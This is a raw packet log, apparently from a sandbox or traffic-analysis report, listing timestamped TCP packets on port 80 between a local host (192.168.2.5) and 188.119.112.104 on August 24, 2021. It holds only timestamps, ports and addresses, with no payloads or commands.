Aug 24, 2021 08:50:16.182569981 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.182579041 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.182611942 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.185261011 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.185290098 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.185309887 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.185328007 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.185354948 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.185364008 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.185372114 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.185401917 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.185442924 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.312424898 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.341919899 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.341945887 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.341983080 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342000961 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342025995 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342045069 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342071056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342086077 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342149019 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342184067 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342206001 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342226982 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342247009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342262983 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342269897 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342289925 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342292070 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342309952 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342331886 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342334032 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342351913 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342371941 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342379093 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342396021 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342415094 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342417002 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342436075 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342454910 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342463970 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342479944 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342499971 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342509031 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342525005 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342544079 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342551947 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342570066 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342590094 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342592955 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342608929 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342628956 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342638969 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342653990 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342674017 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342675924 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342694044 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342711926 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342713118 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342734098 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342750072 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342753887 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342772961 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342786074 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342792988 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342813969 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342818022 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342833042 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342853069 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342868090 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342879057 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342897892 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342905998 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342922926 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342941046 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342950106 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342969894 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.342986107 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.342991114 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343009949 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343034029 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343054056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343061924 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343080044 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343099117 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343106985 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343152046 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343159914 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343174934 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343194962 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343202114 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343221903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343242884 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343245029 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343261957 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343281984 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343286037 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343302011 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343321085 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343328953 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343346119 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343367100 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343368053 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343385935 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343408108 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343410015 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343426943 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343446970 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343447924 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343467951 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343487978 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343488932 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343509912 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343528032 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343528986 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343549013 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343569040 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343569994 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343588114 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343607903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343611002 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343628883 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343648911 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343651056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343672037 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343686104 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343691111 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343720913 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343748093 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343766928 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343770981 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343787909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343807936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343816996 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343836069 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343854904 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343859911 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343877077 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343894005 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343898058 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343920946 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343929052 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343949080 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343966961 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.343970060 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.343990088 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344006062 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344010115 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344032049 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344046116 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344050884 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344084978 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344110012 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344129086 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344131947 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344150066 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344170094 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344177961 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344191074 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344209909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344213009 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344230890 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344252110 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344257116 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344278097 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344297886 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344299078 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344319105 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344338894 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344356060 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344363928 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344383955 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344386101 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344404936 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344424009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344433069 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344449043 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344470024 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344471931 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344491959 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344510078 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344521999 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344543934 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344559908 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344563007 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344584942 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344600916 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344619036 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344623089 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344644070 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344650984 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344665051 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344681978 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344685078 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344706059 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344727039 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344753981 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344763041 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344775915 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344794989 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344795942 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344818115 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344819069 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344837904 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344863892 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344866037 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344885111 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344911098 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344923019 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344933033 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344953060 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344959974 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.344975948 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.344995975 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345015049 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345020056 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345041037 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345051050 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345071077 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345096111 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345113039 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345133066 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345148087 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345161915 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345182896 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345206976 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345216990 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345227957 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345253944 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345273972 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345287085 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345293999 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345304966 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345314980 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345335007 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345356941 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345377922 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345381975 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345401049 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345410109 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345424891 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.345468044 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.345501900 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.354419947 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.366555929 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.366584063 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369328022 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.369853020 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369879007 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369899035 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369918108 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369937897 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369967937 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.369973898 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.369988918 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370013952 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370033979 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370052099 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370057106 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370071888 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370078087 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370091915 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370115042 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370117903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370138884 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370152950 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370157957 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370177984 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370182991 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370198965 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370222092 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370240927 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370253086 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370265007 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370284081 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370301962 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370311022 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370322943 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370332003 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370337963 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370342970 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370361090 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370384932 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370403051 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370410919 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370425940 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370444059 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370446920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370467901 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370486975 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370500088 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370512009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370531082 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370549917 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370557070 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370568991 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370588064 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370601892 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370611906 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370630980 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370631933 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370651007 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370675087 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370693922 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370697021 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370717049 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370740891 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370744944 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370760918 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370784998 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370803118 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370819092 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370831013 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370851040 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370858908 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370876074 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370896101 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370897055 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370918036 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370935917 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.370938063 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370958090 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.370976925 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371001005 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371011972 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371022940 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371032953 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371042967 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371062040 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371084929 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371102095 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371104956 CEST	80	49766	188.119.112.104	192.168.2.5
